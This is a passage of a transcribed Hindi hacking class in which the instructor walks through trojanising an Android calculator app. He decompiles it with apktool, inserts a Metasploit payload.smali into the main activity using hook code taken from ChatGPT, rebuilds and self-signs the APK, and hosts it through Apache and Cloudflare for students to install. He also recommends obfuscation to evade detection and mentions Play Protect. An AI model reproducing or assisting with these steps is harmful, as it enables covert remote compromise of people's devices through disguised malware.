है वो पेज जो रन होगा, ऐसे कई सारे पेजेस होते हैं, एक्टिविटीज कई सारी हो सकती है। मुझे जो जहां पे सबसे पहला एक्टिविटी लिखा होगा ना, उस पर नजर रखनी है। उसमें जब मैं देखूंगा तो मुझे एक पूरा लोकेशन मिलेगा नेम के अंदर, नेम नाम का वेरिएबल होगा, वहां पे पूरा ऐप का लोकेशन दिख रहा है।
ये वो पेज है जो ऐप के चालू होते ही सबसे पहले देखने को मिलता है। मुझे इसी पेज के साथ मेरा जो मिलिशियस प्रोग्राम है वो जोड़ना है। तो मैंने क्या करा, इसके नाम को कर लिया कॉपी और देख भी लिया। इसका नाम है कैलकुलेटर एक्टिविटी, है ना। हमने कहा ठीक है। अब मैंने क्या करा, इसे क्लोज कर दिया। इस कैलकुलेटर के स्मॉली फाइल्स में मैं जाऊंगा, जो मेन एक्टिविटी थी ना वो ढूंढूंगा। तो जो कैलकुलेटर वाली मेन प्रोग्राम था उसे ढूंढूंगा और उसमें कोड ऐड कर दूंगा। तो मैंने लिखा सी डी स्मॉली एलएस। इसने कहा सर ये सारे फोल्डर है। मैंने कहा मेरे हिसाब से ये होगा MIUI में। एक्चुअली क्या है, जो ऐप का नाम था ना, मैं पेस्ट करता हूँ, मैंने कॉपी कर लिया था। ये नाम बताता है कि इसकी लोकेशन कहाँ पे है। सबसे पहले कॉम फोल्डर आएगा, फिर MIUI फोल्डर आएगा, फिर कैलकुलेटर फोल्डर आएगा, फिर कैल्क फोल्डर आएगा। वहां ये एक्टिविटी पड़ी है। तो ये रहा कॉम नाम का फोल्डर। मैं जाऊंगा सबसे पहले कॉम में, CD कॉम। फिर ऑब्वियस है कि यहाँ पे MIUI नाम का फोल्डर होना चाहिए, और पड़ा भी है। मैंने लिखा CD MIUI। फिर एलएस। फिर सर यहाँ पे क्या नाम था, तीसरा कैलकुलेटर ही था उस मैं नेम में। फिर से पेस्ट करता हूँ, तीसरा कैलकुलेटर है ये। तो कैलकुलेटर फोल्डर में जाना है, CD कैलकुलेटर। फिर एलएस करने पे कई सारी फाइल्स दिख रही है, जिसमें कौन सी फाइल थी हमारी, फिर से पेस्ट, कैल्क नाम की थी मेरे हिसाब से। चैट में लिखो सब लोग क्या थी, कैल्क की थी, तो CD कैल्क लिखा। फिर एलएस करा। अब यहाँ पे कई सारी फाइल आ गई। इसमें मेन ही थी, इसमें क्या नाम था फाइल, कैलकुलेटर एक्टिविटी। ये होगी मेन प्रोग्राम फाइल। अगर मैं टैब बटन प्रेस करूंगा ना, या फिर स्टार्टिंग में कुछ लिखना पड़ेगा, चलो पहले देखते हैं, सी की रेंज में जाते हैं। ये आ गया कैलकुलेटर का पेज, कैलकुलेटर एक्टिविटी डॉट स्मॉली। मेन फाइल मिल गई। क्या सेटिंग है वैसे तो मेन फाइल ये है, कैलकुलेटर एक्टिविटी डॉट स्मॉली फाइल। मैंने इसे करा कॉपी। अब मैं दो काम कर सकता हूं, या तो हमारी जो पेलोड फाइल है उसे यही कॉपी कर दूं, और ऐसा करने पे हमारा काम आसान हो जाएगा। ऐसा ही कर देते हैं। तो अब मैं कमांड लिखूंगा, CP होम काली। होम काली के बाद हैग। हैग के बाद क्या नाम था हमारे ऐप का, मिलिशियस ऐप का, सनम। सनम फोल्डर में स्मॉली नाम का फोल्डर है। उसके अंदर कौन सा फोल्डर था, कॉम, मेटास्प्लॉइट स्टेज और पेलोड डॉट स्मॉली फाइल। ये फाइल मुझे कॉपी करनी है। कहाँ करनी है, करंट लोकेशन में। तो करंट लोकेशन ये रही मेरी। मैं चलो यहीं लिख देता हूँ, या फिर एक काम करता हूँ, एक बार एंटर प्रेस कर दूं और इसके बाद PWD कर देता हूँ। हाँ, हमने इस लोकेशन के आगे कह दिया कि भाई इस लोकेशन को कॉपी कर दो। एंटर प्रेस करा, LS करा। आप देखोगे यहाँ पे पेलोड डॉट स्मॉली फाइल आ चुकी होगी। विजिबल है सभी को, स्मॉली फाइल तो आ गई। अब इसे रन करना है। रन कैसे होगी, तो सर आप लिखोगे gedit और मेन एक्टिविटी का नाम, विच इज कैलकुलेटर एक्टिविटी डॉट स्मॉली फाइल। एंटर। यहाँ पे आपको ऑन लोड कर, नहीं, ऑन क्लिक करके एक फंक्शन दिखना चाहिए, और यहाँ तो फंक्शन ही नहीं है। कोई बात नहीं, चलो। इसने डायरेक्ट क्लिक करा है विदाउट कॉल। कुछ एडिट तो नहीं कर दिया मैंने। ठीक है, ठीक है, कोई इशू नहीं है। इसने डायरेक्ट एक फंक्शन कॉल करा है। मुझे यहाँ एक फंक्शन बनाना पड़ेगा। वो फंक्शन मुझे चैट जीपीटी से लेना पड़ेगा। हमें तो प्रोग्रामिंग नहीं आती ना इसकी। तो हम जाएंगे अपने चैट जीपीटी के पास, और यहाँ पे जाके लिखूंगा आई वॉन्ट टू
I want to hook my payload dot smalley file in a calculator app. प्रोसेस चाहो तो इसका फॉलो करो, चाहो तो मत करो। ठीक है, हमें चाहिए बस कोड। कोड अभी ये देगा, ये रहा कोड। पर ये परफेक्ट कोड नहीं है, ये है परफेक्ट कोड। उसने कॉपी करने का कहा है क्या? कोड है ही नहीं इसलिए सर्च नहीं कर रहा। कोड कॉपी पेस्ट करूंगा। अभी नहीं चलेगा सनम, आपने क्लास लेट ज्वाइन करी है ना सनम। एक बार स्टार्टिंग से रिकॉर्डिंग देखना, थोड़ा आइडिया लग जाएगा कि मैं ये क्या करा रहा हूँ और क्यों समझ नहीं आएगा वो भी है। परफेक्ट, हमें बस ये कोड एज एज इट इज कॉपी पेस्ट करना है। ठीक है, ये ऑन क्रिएट का ही है, हमें और किसी से तो लेने देने है नहीं, सब कुछ ठीक है। पेज दिस एंड ऑफ द फाइल, राइट क्लिक एंड क्लास और राइट बिफोर एंड क्लास। ठीक है, एंड मेथड कॉपी पेस्ट यहाँ से नहीं होगा, हो जाएगा। चलो ट्राई करते हैं। कॉपी एंड मेथड एंड क्लास है ही नहीं। अब बस फर्क इतना सा है कि ये एलकॉम एम आई यू आई, ये जो लोकेशन है कैल्क तक, ये एज इट इज आएगी। एक काम करते हैं ना, जब कॉपी हो ही रहा है पूरा कर देते हैं। अब इसको बस लोकेशन, मुझे बस लोकेशन बतानी है मेरी पेलोड और स्मॉली फाइल की, है ना। तो बात यह है कि मेरी पेलोड और स्मॉली फाइल भी इसी लोकेशन में पड़ी है।
ये आ गया अपना मेन कोड। सैंपल पेलोड फॉर टेस्टिंग टेस्ट। ये आ गया कंप्लीट कोड। जो हमें पेलोड हुक करना था इसने खुद ने कर दिया। हमने करा इसे कॉपी, और हमने यहाँ पे सब कुछ हटा के कर दिया पेस्ट। ठीक है, पूरा सेट हो चुका है। पेलोड हमने जोड़ दिया है। अब हमें क्या करना है, ऐप को फिर से बनाना है, रीबिल्ड करना है। ठीक है, तो हम क्या करेंगे, इसको तो कर देते हैं क्लोज। सारी सेटिंग्स कर दी, cd स्पेस डॉट डॉट, cd स्पेस डॉट डॉट, cd स्पेस डॉट डॉट। ठीक है, अब ये जो कैल्क नाम की फाइल है ना, मुझे इसे फिर से बनाना है, बिल्ड करना है। तो मैं यहाँ पे लिखूंगा एपीके टूल स्पेस बी। बी का मतलब बिल्ड करो, डी का मतलब था डिकम्पाइल करो, इसका मतलब खोलना, हाँ? और बी का मतलब है फिर से बिल्ड करो। सेव हो गया था, सेव नहीं होता तो एरर दिखा देता, मतलब वो खुद ही पॉपअप दिखाता। ठीक है, कंट्रोल एस से सेव कर दिया था मैंने। अगर बिना सेव करे बंद करता हूँ ना, तो खुद पूछता है कि क्या करना है, सेव करना है कि नहीं करना है, ऐसा पूछेगा। खैर, एपीके टूल बी लिखा, उसके बाद मैंने फाइल का नाम लिख दिया। मैंने कहा कैल्क डॉट एप्लीकेशन को बनाओ, नया ऐप बनाओ, और ऐप का नाम रखो डेमो कैल्क डॉट एपीके। एंटर प्रेस करा, ये ऐप को फिर से बना रहा है, लेकिन ध्यान रखना, अभी जो ये मुझे ऐप फाइल बना के देगा वो एक डेमो फाइल है। क्या बिना सिग्नेचर के कोई भी डेमो फाइल किसी एंड्रॉइड में रन होगी? अब आपको सिग्नेचर्स ऐड करना है। सिग्नेचर्स ऐड कैसे करोगे, तो उसका कोड आपको यहाँ मिल जाएगा, इसने खुद ही ना बता दिया होगा यहाँ पे, और मेरे वीडियो में भी आपको मिल जाएगा। मैं वीडियो भी रिकमेंड कर दूंगा। ऑल द वीडियो में ये पूरा प्रोसेस नहीं मिलेगा, ध्यान रखना। मुझे सबसे पहले एक सिग्नेचर फाइल बनानी है जिसका कमांड ये है। मैंने इसे कर लिया कॉपी। एक्चुअली दो कमांड्स है, पहला कमांड पहले कॉपी होगा, दूसरे कमांड से वो राइट होगा। ये तो हमने कर लिया एपीके टूल वाला। ठीक है, अगर मैं एलएस करूं, मैंने एक गलती करी, फिर से कमांड रन कर देता हूँ। एक्चुअली हाइफन ओ लिखना था कि आउटपुट कहाँ देना है। मुझे सामने आउटपुट चाहिए था ना, इसने कैल्क फोल्डर के अंदर दे दिया आउटपुट। मुझे अंदर नहीं चाहिए, सामने ही चाहिए थे। आ गई एक डेमो कैल्क डॉट एपी के नाम की फाइल। अब क्या किया हमने यहाँ पे, एक सिग्नेचर फाइल बनाने के लिए जो कमांड कॉपी किया था वो पेस्ट किया। ये सिग्नेचर फाइल बना रहा है। सिग्नेचर फाइल से कि मुझसे डेटा मांगेगा, जैसे डेवलपर का नाम, एक्सवाइजेड इंफॉर्मेशन, सबसे पहले पासवर्ड रखने के बोलेगा। तो मैंने एक पासवर्ड रख दिया। पासवर्ड मुझे याद है मैंने क्या रखा। ठीक है, फिर से टाइप कर दिया। फर्स्ट नेम पूछ रहा है, मैंने लिख दिया आशीष। नेम ऑफ ऑर्गेनाइजेशन टेस्ट लिख दिया। ठीक है, नेम ऑफ व्हाट इज द नेम ऑफ योर, अच्छा ऑर्गेनाइजेशन यूनिट, ऑर्गेनाइजेशन पूछा है। कुछ भी लिख देना, कोई फर्क नहीं पड़ता, क्रॉस चेक नहीं हो रहा है, बस कुछ लिख होना चाहिए। कुछ नहीं भी लिखोगे तो अननोन वैल्यू आ जाएगी। ठीक है, मैंने यहाँ लिख दिया टेस्ट वन। नेम ऑफ सिटी और लोकेलिटी डबल ए, स्टेट RAJ, कंट्री कोड HS, दो लेटर्स लिखने तो कोई भी। ठीक है, वैसे तो लेटर नहीं आएगा, नंबर आएगा, बट ठीक है। फिलहाल एंटर प्रेस कर देता हूँ, अननोन कर देता हूँ। इसने कहा आपने ये सारी डिटेल दी है, क्या है डिटेल सही है, तो हमने लिखा यस। ठीक है, जब ये यहाँ पे ऐसे पूछा ना सारी डिटेल्स दिखा के कि क्या करना है, सही है कि नहीं, तब आपको यस लिखनी है।
इसने कहा ठीक है, इसने मेरे लिए एक फाइल बना दी टेस्ट डॉट की स्टोर। ये सिग्नेचर फाइल मुझे इस ऐप के अंदर जोड़नी है, जिसके लिए सेकंड कमांड काम आएगा, विच इज जार साइनर, जावा साइनर, जो साइन करेगा एप्लीकेशन को। मैंने करा इसे कॉपी, यहाँ कर दिया पेस्ट। मैंने कहा एप्लीकेशन को जोड़ दो। जब जोड़ने का कहूंगा तो फिर से पासवर्ड मांगेगा कि पासवर्ड दो जोड़ने के लिए, तो मैंने अपना पासवर्ड लिखा और इसने नहीं जोड़ पाया। अच्छा, क्यों नहीं जोड़ पाया? क्योंकि ऐप का नाम गलत है ना। मैंने सही से चेक नहीं किया, फाइल का नाम तो हमने सही दिया है, जिस ऐप में जोड़ना है उसका नाम सही देना पड़ेगा, विच इज डेमो कैल्क, डेमो कैल्क डॉट एपीके। अब सही नाम है, अब सब कुछ सही होगा। एंटर प्रेस करके पासवर्ड मांगा, Ashish@123। ऐप को इसने साइन भी कर दिया है। ठीक है, एक फाइनल टास्क करना है, शायद करने की जरूरत पड़ेगी, शायद नहीं पड़ेगी, लेट्स सी। सीधा इंस्टॉल करना है। चलो हो गया, ऐप रेडी हो गया इसके हिसाब से। अब देखना है कि ऐप काम कर रहा है कि नहीं कर रहा है। सो हम क्या करेंगे, अब इसको ले जाते हैं, होस्ट करते हैं। तो 6 मिनट हैं, थोड़ा जल्दी करते हैं। मैं करूंगा सीपी, और ऐप का नाम है, क्या रखा है ऐप का नाम? ऐप का नाम है, ये तो चेक नहीं किया ऐप को किस नाम से स्टोर कराऊं। T2 जार साइनर। अच्छा, उसी में साइन कर दिया ना। तो डेमो कैलकी हमारा रियल ऐप हो गया अब। डेमो कैलकी है, डेमो कैलकुलेटर ही है, ठीक है। यही हमारा रियल ऐप है, मैंने इसे कॉपी किया। सीपी डेमो कैल्क, इसको मैं कॉपी कर देता हूँ होम काली, और नॉट होम काली, वार www.html। एंड उसमें एक फाइल नाम थी, क्या नाम था, के से था, कमल। ये ऐप मैंने यहाँ रख दिया। और अब मैं क्या करता हूँ, इस ऐप को पब्लिक कर देता हूँ, क्लाउड फ्लेयर 480, न्यू टैब, the suite service Apache to start, URL, इसको किया कॉपी। एक तो चैट में शेयर कर देता हूँ, जितने लोग ओपन कर सकते हैं अपने अपने डिवाइस में। देखो अभी ऐप रन हो रहा है कि नहीं हो रहा है, ये कोशिश क्या रिजल्ट ला रही है, देखो एक बार, है ना। ऑल दो इसमें और भी चेंजेस अब आपको करने पड़ेंगे, बट पहले देखते हैं ये वर्क कर रहा है कि नहीं कर रहा है। अगर कर जाता है तो बहुत अच्छा है, अदरवाइज देखते हैं क्या करना है। डेमो क्या हुआ है, इसको मैं कन्वर्ट कर देता हूँ यूआरएल टू क्यूआरएल। चैट में लिखना अशफाक, एरर है, एरर अशफाक कल रिजॉल्व करा देना, ताकि एटलीस्ट एक टास्क पूरा हो जाए। जिसके यूआरएल कॉपी का ऑप्शन नहीं है, वो क्यूआर कॉपी कर लेना। तो चैट में लिख दो अशफाक मुझे एक बार। ऐप इंस्टॉल हो रहा है, मतलब क्या जो हमारा प्ले प्रोटेक्शन है वो रोक रहा है। इस यूआरएल के बाद में, यूआरएल ट्राई नहीं करना है ना, यूआरएल के बाद में लिखना कमल। एक सेकेंड, यूआरएल के बाद क्या लिखवाया था मैंने? कमल लिखना, कमल लिखने पे ऐप आ जाएगा। ऐप का नाम है डेमो कैल्क, 9.3 MB का, बिल्कुल सही। इंस्टॉल हो रहा है कि नहीं हो रहा है, वो ही सारा गेम है।
बाकियों की डिवाइस में ऐप इंस्टॉल हो रहा है, चैट में बताना मुझे। एपी के नहीं आ रहा। ऊपर एड्रेस जो मैंने दिया है ना, उसके बाद स्लैश लिख के कमल लिखो। संदीप ऐप इंस्टॉल हो गया? वेरी गुड। एड्रेस बार में लिखो ऊपर, ब्राउजर में एड्रेस बार आता है ना ऊपर। मोबाइल में भी तो ब्राउजर में एड्रेस बार आता है ऊपर। ऊपर लिख के एंड में स्लैश कमल लिख दो। परफेक्ट एवरीवन। एक बार पूरी क्लास की रिकॉर्डिंग देख के अच्छे से एक्टिविटीज परफॉर्म करना। ध्यान रखना, जब आप एक्टिविटीज परफॉर्म करोगे तो टूल्स में एरर आएगी। जैसे जार साइनर पहले से नहीं पढ़ा होगा, एपी के टूल पहले से नहीं पढ़ा होगा। कोशिश करना थोड़ा बहुत चैट जीपीटी का सपोर्ट लेके एरर रिजोल्व करना, बाकी का मैं खुद कल करवा दूंगा। बट एक कोशिश जरूर करना सब लोग कि काम कर रहा है कि नहीं कर रहा है। हमारा एक्सपेरिमेंट है, हमें नहीं पता किस लेवल तक काम करेगा, बट ट्राई जरूर करना। क्लिक करते ही डाउनलोड हो जाएगा सनम वैसे तो। एक ट्राई करो आज अपनी अपनी मशीन पे, सब लोग खुद ट्राई करो। फिर नहीं होता तो कल देखते हैं। आप लोगों को ऐसा कुछ दिखा रहा होगा, इसमें ये डेमो कैट डॉट एपी के है। इस पे क्लिक करने पे डाउनलोड तो हो रहा होगा। जिप फाइल कैसे हो सकती है? डेमो कैट पे स्क्रीन शेयर करो सनम अपना। सर हो गए? मैं सर आपने जो मैंने कि एड्रेस बार पे गया डेमो कैल डॉट एपी के डाउनलोड किया, एक मैं मिनट वो सनम, इंस्टॉल नहीं हो हो रहा। गया डाउनलोड? डाउनलोड मतलब उधर क्लिक किया, डाउनलोड हुआ, लेकिन मतलब वो जिप फाइल हो जा रहा है। जिप फाइल हो जा रहा है? हाँ सर। मतलब मैं तो स्क्रीन शेयर करो। मैं तो स्क्रीन शेयर नहीं कर सकता क्योंकि मैं मोबाइल पे कर रहा हूँ, मैं तो टेबलेट और कंप्यूटर पे वो कर रहा हूँ क्लास। तो एक बार आज ट्राई करो, मोबाइल का ही तो स्क्रीन शेयर करना है। मतलब मोबाइल पे नहीं है वो, मैं मोबाइल का कैसे ठीक है, शेयर करूँ? आज एक बार ट्राई करो अपने डिवाइस में सारी एक्टिविटी स्टार्टिंग से परफॉर्म करके। जो भी एरर है उसका स्क्रीनशॉट ले लेना। कल देखते हैं क्यों आ रहा है जिप फाइल, क्योंकि अब सर जिप सर फाइल सर तो नहीं सर आना ही नहीं चाहिए। सर जब एक और एपी डाउट की था। फाइल दे रहे। हाँ सर बताओ। आपने जो कल बताया था कि प्ले स्टोर का जो भी ऐप नहीं होगा वो तो डाउनलोड नहीं होगा। सर मतलब ये तो डाउनलोड होना चाहिए क्योंकि ये प्ले स्टोर का ऐप है। एक्चुअली नहीं है, क्योंकि इसमें जो सिग्नेचर फाइल है वो मेरी है, वो प्ले स्टोर में रजिस्टर नहीं है। इसकी जो हैश आईडी वो प्ले स्टोर में रजिस्टर नहीं है। तो ये प्ले स्टोर का ऐप है नहीं। लेकिन इसके डाउनलोड होने के चांसेस फिर भी हैं, क्योंकि ये बहुत जेन्युइन ऐप है। तो हमें बस वही देखना है कि वो हो रहा है कि नहीं हो रहा है। अगर नहीं भी होगा तो मैंने स्टार्टिंग में कुछ इनपुट दिए हैं क्लास के स्टार्टिंग में, वो एक बार देख लें। ओके ओके सर, देखो मैं ट्राई करूंगा सर, होता है तो देखा जाएगा। ओके एवरीवन, सो बाय एंड गुड नाइट। बाकी का पार्ट नेक्स्ट क्लास में करेंगे। एक बार जो करा है पूरा प्रैक्टिस करना। मैंने स्टार्टिंग में जो चीज समझाई थी वो थोड़ा ध्यान रखना। हम एक्सपेरिमेंट कर रहे हैं, हमें नहीं पता है वर्क करेगा कि नहीं करेगा। अगर आपको मैन्युअली ऐप बनाना आ गया तो आप इसमें एक्सपेरिमेंट ज्यादा कर पाओगे। इसमें ऑब्सर्फिकेशन होता है, जिसका मतलब पैकेट को छुपा देना ताकि कोई डिटेक्ट ना कर सके। वो काम आ सकता है। कुछ सर्टिफिकेट्स मैन्युअली खुद भी ऐड कर सकते हो। तो धीरे धीरे ऐप को नेक्स्ट लेवल तक ले जा सकते हो। इसीलिए मैंने मैनुअल बनाना सिखाया। बाय एवरीवन, गुड नाइट सबको।